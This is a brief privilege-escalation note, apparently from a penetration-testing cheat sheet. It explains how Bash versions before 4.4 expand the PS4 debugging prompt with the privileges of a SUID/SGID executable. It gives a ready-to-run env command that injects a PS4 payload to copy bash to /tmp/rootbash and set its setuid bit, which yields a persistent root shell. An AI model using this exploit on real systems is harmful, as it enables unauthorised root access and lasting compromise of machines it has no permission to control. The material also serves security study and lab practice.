This only works on versions of Bash before v4.4!
When Bash is in debugging mode (SHELLOPTS=xtrace), the $PS4 prompt is used to display debugging information.
It would appear that this prompt somehow inherits the permissions of the executable being run. This includes SUID/SGID permissions (at least for Bash < 4.4)!
If you have access to a SUID/SGID executable, this can be abused to create root shells:
env -i \
SHELLOPTS=xtrace \
PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' \
/path/to/suid/executableAgain, this only works if the calling application is relying on the current shell for helper execution.